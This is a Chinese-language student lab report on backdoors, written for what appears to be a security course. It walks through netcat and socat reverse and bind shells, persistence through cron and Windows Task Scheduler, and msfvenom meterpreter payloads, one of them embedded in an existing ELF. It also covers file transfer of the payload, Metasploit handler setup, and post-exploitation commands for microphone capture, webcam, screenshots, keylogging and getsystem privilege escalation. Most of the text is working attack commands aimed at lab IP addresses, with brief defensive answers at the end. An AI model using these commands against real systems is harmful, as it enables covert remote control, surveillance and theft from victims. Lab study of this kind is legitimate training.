一、实践基本内容

1.实践目标

(1)使用netcat获取主机操作Shell，cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

(5)可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

2.实践前期准备

在实践前期先熟悉一下ncat的使用，使用前确定Linux和Windows都安装好了ncat。

Windows中命令行中输入指令 ipconfig 查看本机ip

Linux终端中输入指令 ifconfig 查看ip地址

可以确定Windows的ip为 192.168.1.102 ；Linux的ip为 192.168.192.128

2.1使用ncat，本机（Windows）获得虚拟机（Linux）操作shell

步骤1：win中使用ncat监听4316端口： ncat.exe -l -p 4316

步骤2：在Linux输入指令  nc 192.168.1.102 4316 -e /bin/sh  反弹连接Windows主机的 4316 端口（指令中的ip地址需为Windows ip）

结果：本机（Windows）成功获得虚拟机（Linux）操作shell，能够进行操作。

此时本机（Windows）为攻击者，虚拟机（Linux）为靶机也就是被攻击者。

2.2使用ncat，虚拟机（Linux）获得本机（Windows）操作shell（大体步骤与上述类似）

步骤1：在Linux中监听4316端口：nc -l -p 4316

步骤2：在Windows输入指令 ncat.exe  -e cmd.exe 192.168.192.128 4316 反弹连接Linux的4316端口（指令中的ip地址需为Linux ip）

结果：虚拟机（Linux）成功获得本机（Windows）操作shell，能够执行Windows中的命令。

此时本机（Windows）为靶机，虚拟机（Linux）也就是攻击者。

二、实践具体步骤

目标一：使用netcat获取主机操作Shell，cron启动

cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程，与windows下的计划任务类似，当安装完成操作系统后，默认会安装此服务 工具，并且会自动启动cron进程，cron进程每分钟会定期检查是否有要执行的任务，如果有要执行的任务，则自动执行该任务。

crontab文件的含义：

用户所建立的crontab文件中，每一行都代表一项任务，每行的每个字段代表一项设置，它的格式共分为六个字段，前五段是时间设定段，第六段是要执行的命令段，格式如下：minute hour day month week command

实践参考：Linux定时任务Crontab命令详解

具体步骤：

1.用 crontab -e 指令编辑定时任务，选择3，也就是基本的vim编辑器

2.vim编辑器中用  i  改为插入模式，在最后一行插入 00 21 20 3 * /bin/netcat 192.168.1.102 4316 -e /bin/sh   后输入 :wq! 保存并退出，上述指令表示在3月20号的晚上九点（21:00）反向连接Windows本机的4316端口，就会启动cron。

3.在21:00之前输入 ls 指令，屏幕上并无显示，当时间到了21:00时，此时已经获得了shell，指令所得内容则显示了出来

目标二：使用socat获取主机操作Shell, 任务计划启动

实践参考：socat使用笔记

socat是ncat的增强版，socat的基本功能就是建立两个双向的字节流，数据就在其间传输，参数address就是代表了其中的一个方向。作为一款双向数据流通道工具，它拥有许多强大的功能：端口的连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等。

实践前在Windows安装好socat。

具体步骤：

1.win中打开控制面板，选中管理工具->任务计划程序

2.创建新任务，填写任务名称，新建一个触发器。

3.同时创建新操作，在操作->程序或脚本中选择 socat.exe 文件的路径，在添加参数一栏填写 tcp-listen:4316 exec:cmd.exe,pty,stderr ，这个命令的作用是把cmd.exe绑定到端口4316，同时把cmd.exe的stderr重定向到stdout上

4.按快捷键win+L即能锁定计算机，创建的任务开始运行。

此时在Linux中输入指令 socat - tcp:192.168.1.102:4316 ，发现成功获得了cmd shell，能够输入Windows的命令

目标三：使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

P.S.由于重新开机，此时Windows的ip地址变更为192.168.43.137，Linux虚拟机ip地址变更为192.168.192.129.

具体步骤：

1.Linux中输入指令生成后门程序（因为靶机系统为win10的64位故在指令中参数加上x64）

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -f exe > 20164316.exe

2.使用ncat传输已经生成的20164316.exe程序文件。（通过2222端口）

i）在win中输入： ncat.exe -lv 2222 > 4316.exe 监听并接受后门程序；

ii）在Linux中输入： nc 192.168.43.137 2222 < 20164316.exe 向win传输后门程序。

3.在Linux中输入指令msfconsole，进入msf命令行，msf启动监听前需要进行一些设置

use exploit/multi/handler    /*进入handler模式*/set payload windows/x64/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/show options  /*查看当前信息状态*/set LHOST 192.168.192.129  /*设置LHOST，其中ip为Linux的ip*/set LPORT 4316 /*设置LPORT*/exploit /*启动监听*/

启动监听后再在win中运行后门程序，此时Linux上已经获得了Windows主机的连接，并且得到了远程控制的shell，能够输入Windows中的命令。

目标四：使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

实践参考：获取shell之后进一步利用

具体步骤：

record_mic//该指令可以截获音频

webcam_snap//该指令可以使用摄像头进行拍照

screenshot//该指令可以进行截屏

keyscan_start//输入该指令开始记录下击键的过程

keyscan_dump//输入该指令读取击键的记录

P.S.由于本机Windows缺少摄像头驱动，所以摄像头进行拍照不能进行，webcam_snap等命令会回复缺少摄像头设备

getuid 指令查看当前用户，使用 getsystem 指令进行提权，如图未提权成功。

在win中重新尝试以管理员身份运行后门程序后再进入msf命令行中进行提权，使用 getsystem 指令提权成功

目标五：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

实践参考：使用MSF生成shellcode

在完成该目标时，直接在两台虚拟机Linux之间进行，大致步骤与目标三相同，要点在于shellcode的生成。

具体步骤：

1.利用指令 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -x /root/Desktop/20164316zzy -f elf > 20164316zzy_2  生成以20164316zzy为模板这个elf文件格式的shellcode文件20164316zzy_2

（由靶机为Linux且20164316zzy这个文件是32位的来确定参数）

2.输入指令msfconsole，进入msf命令行，msf启动监听前需要进行一些设置

use exploit/multi/handler    /*进入handler模式*/set payload linux/x86/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/show options  /*查看当前信息状态*/set LHOST 192.168.192.129  /*设置LHOST，其中ip为攻击者Linux的ip*/set LPORT 4316 /*设置LPORT*/exploit /*启动监听*/

3.msf中启动监听，在被攻击者Linux中  ./20164316zzy_2 运行程序，此时攻击者Linux上已经获得了被攻击者Linux的连接，并且得到了远程控制的shell

失败尝试：实验中要求生成shellcode然后注入pwn可执行文件，但由于未知原因...并没有成功

具体步骤：

1.利用msf生成shellcode（要注意生成的shellcode中不能含有\x00\x0a\，可手动删除或参数设置）

这里可以直接在msf命令行中生成，也可用msfvenom指令来进行生成。（我在前后进行了两种生成方式）

2.利用实验一的知识，将生成的shellcode注入到可执行文件中。

（要记得利用gdb调试工具来确定注入地址来覆盖esp寄存器）

3.最后两种shellcode的注入都只是得到了段错误的结果...

同时我也采用了msf监听模式，在另一台Linux虚拟机中运行可执行文件后，msf中并没有显示有监听到任何连接...（这里忘了截图）

在网上查询有关段错误的反应大都是因为shellcode保存在内存的.data数据段是不能被执行的。

但是在步骤2注入之前都对可执行文件进行了实验一预设条件的执行，关闭了堆栈保护等。

由于自身知识的缺乏，也不能确定第一步的shellcode生成语句是否正确，所以暂时不能清楚实验失败 的原因。

三、实践所遇问题与解决

1.目标三中运行了后门程序（在任务管理器中也能看到），但是msf监听这边没有反应。

问题原因及解决：生成后门程序的语句为 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -f exe > 20164316.exe  ，加上了参数x64，但是在msf的设置payload中，指令 set payload windows/meterpreter/reverse_tcp  未加上x64，是msf存在的共性问题，导致无法监听到后门程序的运行；加上参数后即能连接Windows获取shell，成功结果截图见目标三。

四、实践问题回答与收获

基础问题回答：

　　(1)例举你能想到的一个后门进入到你系统中的可能方式？

　　答：后门程序可能与我下载的某些盗版软件捆绑下载，从而下载到我的电脑。

　　(2)例举你知道的后门如何启动起来(win及linux)的方式？

　　答：win中后门可能与某些软件捆绑运行达到启动的目的；

Linux中通过设置corn定时启动后门程序。

　　(3)Meterpreter有哪些给你映像深刻的功能？

　　答：能够获得摄像头权限和键盘使用权限并且能够监视键盘键入！让我意识到一旦被攻击，是非常恐怖的....

　　(4)如何发现自己有系统有没有被安装后门？

　　答：稍微低级一点的，例如360安全软件和防火墙，我在做实验时起初就因为没有关掉360杀毒软件导致后门程序一被传输过来就被杀死了。更加仔细一点的话，可以通过查看进程和利用一些抓包工具来进行分析。（前提是后门程序启动了）

实践收获

　　此次实践让我熟悉了后门程序的生成，以及ncat、socat的使用，更让人认识到了后门的危害...而我们学习如何攻击的同时，也应该了解如何防范。在实践中，也多次查询各种资料来完成，这种解决问题的方式，让人学习得更深刻和透彻。